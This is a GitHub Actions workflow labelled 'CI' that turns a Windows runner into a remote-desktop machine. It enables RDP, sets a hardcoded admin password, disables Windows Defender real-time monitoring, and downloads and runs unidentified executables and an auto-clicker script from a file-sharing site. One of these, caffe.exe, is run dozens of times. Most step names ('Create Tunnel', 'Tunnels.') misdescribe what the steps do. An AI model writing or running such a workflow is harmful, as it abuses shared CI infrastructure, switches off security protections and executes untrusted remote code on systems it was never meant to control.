name: CI

on: [push, workflow_dispatch]

jobs:

  build:
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download
      run: Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Extract
      run: Expand-Archive ngrok.zip
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Ur RDP is working go connect xD!
      run: New-Item -Path "C:\21" -ItemType Directory
    - name: Ur RDP is working go connect xD!
      run: New-Item -Path "C:\2" -ItemType Directory
    - name: Download
      run: New-Item -Path "C:\1" -ItemType Directory
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/Q-vmvctN/-alCekjC.cfb2d7ea5312d62ec1d0e2526931fc5d -outfile c:\21\RegMikroMan222.zip
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/lGfloUIL/-alCekjC.6ee6933c75336feda3677d13531c0392 -outfile c:\21\cm413_64.zip
    - name: Tunnels.
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/BeKn3vZF/-alCekjC.52bcf7f6ed4ef638e3e836bf0d559bba -outfile c:\21\start.exe
    - name: Tunnels.
      run: Expand-Archive -LiteralPath "c:\21\RegMikroMan222.zip" -DestinationPath "C:\21"
    - name: Tunnels.
      run: Expand-Archive -LiteralPath "c:\21\cm413_64.zip" -DestinationPath "C:\21"
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell ' -Command "C:\21\start.exe"'
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell -ArgumentList '-Noexit -Command "C:\21\cm413_64\Clickermannv4.13x64\Clickermann.exe" "C:\21\cm413_64\Clickermannv4.13x64\2211.cms"'
    - name: Tunnels.
      run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Tunnels.
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: Download
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/au_hR4Xm/-alCekjC.c032ac889584d9c8bbaa3d59c87c1ec8 -outfile c:\21\1122.exe
    - name: Ur RDP is working go connect xD!
      run: Start-Process Powershell ' -Command "c:\21\1122.exe"'
    - name: Create Tunnel
      run: Invoke-WebRequest -URI https://www.4sync.com/web/directDownload/wqXmkjJu/-alCekjC.d914635d8a6d750ae5347e2687012e18 -outfile c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
    - name: Create Tunnel
      run: cmd /c c:\1\caffe.exe
